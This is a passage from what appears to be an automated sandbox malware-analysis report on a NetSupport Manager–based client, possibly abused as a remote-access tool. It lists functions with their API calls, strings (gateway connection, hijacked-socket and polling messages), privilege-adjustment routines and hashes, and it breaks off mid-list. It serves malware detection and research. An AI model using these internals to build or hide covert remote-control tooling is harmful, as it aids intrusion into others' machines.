String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
API String ID: 3874234733-2061581830
Opcode ID: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
Instruction ID: 707b91cc949213dae1a505c6abf15ec2f20ed18dfa7402eb99b54f6ccfa65761
Opcode Fuzzy Hash: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
Instruction Fuzzy Hash: 05411B70A04714AFD7309F768D84A6BFAF8BF55A04B10492EE496D3A10EBB5E8008F5D

Function 6D1CA980 Relevance: 56.4, APIs: 28, Strings: 4, Instructions: 389
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6D1C5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6D1C8F91,00000000,00000000,6D20B8DA,?,00000080), ref: 6D1C5852

EnterCriticalSection.KERNEL32(6D20B898,?,00000000,00000000), ref: 6D1CAA11
LeaveCriticalSection.KERNEL32(6D20B898), ref: 6D1CAA58
LeaveCriticalSection.KERNEL32(6D20B898), ref: 6D1CAA68
LeaveCriticalSection.KERNEL32(6D20B898), ref: 6D1CAA94
WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 6D1CAB0B
socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAB4E
WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAB5A
#21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAB8E
#21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CABB1
#21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CABE3
bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAC18
WSAGetLastError.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAC21
closesocket.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAC29
htons.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAC65
WSASetBlockingHook.WSOCK32(6D1C63A0,00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAC76
WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAC8F
WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAC96
closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAC9C
WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CACFD
WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAD04
closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAD0A
WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAD45
EnterCriticalSection.KERNEL32(6D20B898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAD4F
InitializeCriticalSection.KERNEL32(-6D20CB4A), ref: 6D1CADE6

Part of subcall function 6D1C8FB0: _memset.LIBCMT ref: 6D1C8FE4
Part of subcall function 6D1C8FB0: getsockname.WSOCK32(?,?,00000010,?,01712FA8,?), ref: 6D1C9005

getsockname.WSOCK32(00000000,?,?), ref: 6D1CAE4B
LeaveCriticalSection.KERNEL32(6D20B898), ref: 6D1CAE60
GetTickCount.KERNEL32 ref: 6D1CAE6C
InterlockedExchange.KERNEL32(?,00000000), ref: 6D1CAE7A

Strings

Cannot connect to gateway %s via web proxy, error %d, xrefs: 6D1CAD14
*TcpNoDelay, xrefs: 6D1CABB8
Cannot connect to gateway %s, error %d, xrefs: 6D1CACA6
Connect error to %s using hijacked socket, error %d, xrefs: 6D1CAB17

Memory Dump Source

Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true

Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd

Yara matches

Similarity

API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTick_memsetbindhtonsinet_ntoasocket
String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
API String ID: 692187944-2561115898
Opcode ID: 574b3296dc474fdc72ae11ba8bce62f71b67a1ab546bdb78f41d81afee3bc80c
Instruction ID: 44f94ec1c88d7db5491e80e620df174b7a2fc33a1a47120a4199ddf8edfa3f0f
Opcode Fuzzy Hash: 574b3296dc474fdc72ae11ba8bce62f71b67a1ab546bdb78f41d81afee3bc80c
Instruction Fuzzy Hash: 86E17271A042199FDB14DF94DC44FEEB3B5EF59304F0141AAEA0DA7284DBB49D84CBA2

Function 11139090 Relevance: 54.7, APIs: 20, Strings: 11, Instructions: 474
windowthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 111390C7
IsWindow.USER32(0003042E), ref: 11139125
IsWindowVisible.USER32(0003042E), ref: 11139133
IsWindowVisible.USER32(0003042E), ref: 1113916B
GetForegroundWindow.USER32 ref: 11139186
EnableWindow.USER32(0003042E,00000000), ref: 111391A0
EnableWindow.USER32(0003042E,00000001), ref: 111391BC
SetForegroundWindow.USER32(00000000), ref: 111391CB
FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 11139209
IsWindowVisible.USER32(00000000), ref: 11139218
IsWindowVisible.USER32(0003042E), ref: 11139248
IsIconic.USER32(0003042E), ref: 11139255
GetForegroundWindow.USER32 ref: 1113925F

Part of subcall function 11131210: ShowWindow.USER32(0003042E,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234

Part of subcall function 11131210: ShowWindow.USER32(0003042E,11139062,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131246

SetForegroundWindow.USER32(00000000), ref: 11139285
EnableWindow.USER32(0003042E,00000001), ref: 11139294
GetLastError.KERNEL32 ref: 11139353
GetLastError.KERNEL32 ref: 111393CB
GetTickCount.KERNEL32 ref: 11139678
GetTickCount.KERNEL32 ref: 11139699

Part of subcall function 11025BB0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,111396E2), ref: 11025BB8

FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 11139734

Strings

Reactivate main window, xrefs: 11139179
NeedsReinstall, xrefs: 11139636
Shell_TrayWnd, xrefs: 11139204
HookDirectSound, xrefs: 11139450
HideWhenIdle, xrefs: 11139154
Client, xrefs: 11139159, 111392DD, 1113963B
disableRunplugin, xrefs: 111392D8
MainWnd = %08x, visible %d, valid %d, xrefs: 1113913D
ShowNeedsReinstall in 15, user=%s, xrefs: 1113966B
File <%s> doesnt exist, e=%d, xrefs: 11139357, 111393CF
Audio, xrefs: 11139455

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
API String ID: 2511061093-2542869446
Opcode ID: 7ac7e7f547aa6a59f7753ff14195bb005c240a68c1cf99adf6e6792122ae882d
Instruction ID: 168a4b77644d94df8a921335772b55db7e1a21360cf08f879ca3086e41f0bcfd
Opcode Fuzzy Hash: 7ac7e7f547aa6a59f7753ff14195bb005c240a68c1cf99adf6e6792122ae882d
Instruction Fuzzy Hash: 700229B8A1062ADFE716DFA4CDD4B6AF766BBC071EF500178E4255728CEB30A844CB51

Function 6D1C91F0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 97sleepnetworkCOMMON

Download Yara Rule

APIs

#16.WSOCK32(00000000,009686C7,6D1D3361,00000000,00000000,6D1D3361,00000007), ref: 6D1C924C
WSAGetLastError.WSOCK32(00000000,009686C7,6D1D3361,00000000,00000000,6D1D3361,00000007), ref: 6D1C925B
GetTickCount.KERNEL32 ref: 6D1C9274
Sleep.KERNEL32(00000001,00000000,009686C7,6D1D3361,00000000,00000000,6D1D3361,00000007), ref: 6D1C92A8
GetTickCount.KERNEL32 ref: 6D1C92B0
Sleep.KERNEL32(00000014), ref: 6D1C92BC

Strings

hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 6D1C922B
ReadSocket - Connection has been closed by peer, xrefs: 6D1C92E0
*RecvTimeout, xrefs: 6D1C927B
ReadSocket - Would block, xrefs: 6D1C928A
ReadSocket - Error %d reading response, xrefs: 6D1C92F7
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6D1C9226

Memory Dump Source

Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true

Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd

Yara matches

Similarity

API ID: CountSleepTick$ErrorLast
String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
API String ID: 2495545493-2497412063
Opcode ID: 865a8e7569a0ed591956d47bcb3e56d2912ca6b137442c0fcb8be585e6646117
Instruction ID: 0959d6c378cab23f2cc04149daa4c79bc6d7105c58f2eee525f9cf659f62cf74
Opcode Fuzzy Hash: 865a8e7569a0ed591956d47bcb3e56d2912ca6b137442c0fcb8be585e6646117
Instruction Fuzzy Hash: 8F314735E4420CAFEB00DFF8D884BAEB3F4EF55319F004469EA48C7144D3B899408792

Function 6D1D3130 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 178timethreadCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,?,?,92DF354D,7AB33BE4,92DF34B3,FFFFFFFF,00000000), ref: 6D1D31E2
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6D1FECB0), ref: 6D1D31EC
GetSystemTime.KERNEL32(?,7AB33BE4,92DF34B3,FFFFFFFF,00000000), ref: 6D1D322A
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6D1FECB0), ref: 6D1D3234
EnterCriticalSection.KERNEL32(6D20B898,?,92DF354D), ref: 6D1D32BE
LeaveCriticalSection.KERNEL32(6D20B898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 6D1D32D3
GetCurrentThreadId.KERNEL32 ref: 6D1D334D

Part of subcall function 6D1DBA20: __strdup.LIBCMT ref: 6D1DBA3A

Part of subcall function 6D1DBB00: _free.LIBCMT ref: 6D1DBB2D

Strings

INFO=1, xrefs: 6D1D3304
CMD=POLL, xrefs: 6D1D32F4
ACK=1, xrefs: 6D1D3312
1.1, xrefs: 6D1D3240, 6D1D324A

Memory Dump Source

Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true

Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd

Yara matches

Similarity

API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
String ID: 1.1$ACK=1$CMD=POLL$INFO=1
API String ID: 1510130979-3441452530
Opcode ID: 7465fe59967d98ec4192bea221a5b9cf4fffd6548de54eb99bf35b288238dae1
Instruction ID: ab1ae0032ef080e9b6cab1e414110c027bc3f012a10d67cc6bf569dfa7c6fd37
Opcode Fuzzy Hash: 7465fe59967d98ec4192bea221a5b9cf4fffd6548de54eb99bf35b288238dae1
Instruction Fuzzy Hash: 1C6183B2D04209AFCB54DFA4D984FEEB7B5FF49304F05851EE516A3244DBB4A504CBA1

Function 11115B70 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 182librarycomloaderCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 11115BC5
CoCreateInstance.OLE32(111C081C,00000000,00000001,111C082C,00000000,?,00000000,Client,silent,00000000,00000000,?,1104BADF), ref: 11115BDF
LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11115C04
GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11115C16
SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11115C29
FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11115C35
CoUninitialize.COMBASE(00000000), ref: 11115CD1

Strings

SHGetSettings, xrefs: 11115C10
SHELL32.DLL, xrefs: 11115BF5

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
String ID: SHELL32.DLL$SHGetSettings
API String ID: 4195908086-2348320231
Opcode ID: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
Instruction ID: 591e2108fd72310e634c09c07143bf968b2bad8d72189eb08e80a39284cb5d12
Opcode Fuzzy Hash: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
Instruction Fuzzy Hash: 1751A075A0020A9FDB40DFE5C9C4AAFFBB9FF89304F104629E516AB244E731A941CB61

Function 110733B0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 110734E0
_memset.LIBCMT ref: 11073659

Strings

_License, xrefs: 110734A1
serial_no, xrefs: 1107349C
NBCTL32.DLL, xrefs: 11073595

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: _memset
String ID: NBCTL32.DLL$_License$serial_no
API String ID: 2102423945-35127696
Opcode ID: 1bc3c350b5695b2c8a219e67917739aeea91881a13f4a17e71b6933ab04c4b4d
Instruction ID: b704a80906741011c15d1468992a84ddd821d027e1e1ff2b1c0992d848e69eb8
Opcode Fuzzy Hash: 1bc3c350b5695b2c8a219e67917739aeea91881a13f4a17e71b6933ab04c4b4d
Instruction Fuzzy Hash: 64B18E75E00209AFE714CFA8DC81BAEB7F5FF88304F148169E9499B295DB71A901CB90

Function 110310C0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(1102E480,?,00000000), ref: 110310E4

Strings

Client32, xrefs: 110310C4
NSMWClass, xrefs: 11031103
NSMWClass, xrefs: 110310EF

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID: Client32$NSMWClass$NSMWClass
API String ID: 3192549508-611217420
Opcode ID: 3211d65015dcc44e5dd59bdf27473333a197f9ceb9b14f7f353df042485d09a4
Instruction ID: e21dedaf74b0f8cf59cf3be59171af9e644e6a1753dc25f7f597d2ad8de8aca1
Opcode Fuzzy Hash: 3211d65015dcc44e5dd59bdf27473333a197f9ceb9b14f7f353df042485d09a4
Instruction Fuzzy Hash: 44F04F7891112A9FCB06DFA9D890A9EF7E4AB4821CB508165E82587348EB30A605CB95

Function 1109D440 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,461C6054,00080000,00000000,00000000), ref: 1109D46D
OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 2349140579-0
Opcode ID: b2ad1513cc86a00d87a5922bdef26ddabf3e928486d47d374c40a1db595ff72d
Instruction ID: 1acc50509d1dc0efa8f8b8857b060522b21de2b31161cc556941a9c494b785c9
Opcode Fuzzy Hash: b2ad1513cc86a00d87a5922bdef26ddabf3e928486d47d374c40a1db595ff72d
Instruction Fuzzy Hash: AE015EB5640218ABD710DFA4CC89BAAF7BCFF44B05F10452DFA1597280D7B1AA04CB71

Function 1109D4D0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109E810,00000244,cant create events), ref: 1109D4EC
CloseHandle.KERNEL32(?,00000000,1109E810,00000244,cant create events), ref: 1109D4F5

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
Instruction ID: ae8e9f792a84aceb39bcb46fd7c9804e810fa9328d8f27f892a8d401e6504800
Opcode Fuzzy Hash: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
Instruction Fuzzy Hash: 55E0EC71654614ABE738CF28DC95FA677ECAF09B01F11495DF9A6D6180CA60F8408B64

Function 1102E640 Relevance: 241.6, APIs: 31, Strings: 106, Instructions: 1869windowthreadsleepCOMMON

Download Yara Rule

APIs

Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477

GetSystemMetrics.USER32(00002000), ref: 1102E7C4
FindWindowA.USER32(NSMWClass,00000000), ref: 1102E985

Part of subcall function 111100D0: GetCurrentThreadId.KERNEL32 ref: 11110166
Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
Part of subcall function 111100D0: EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
Part of subcall function 111100D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2

GetWindowThreadProcessId.USER32(00000000,?), ref: 1102E9C1
OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102E9E9
IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102ECAB

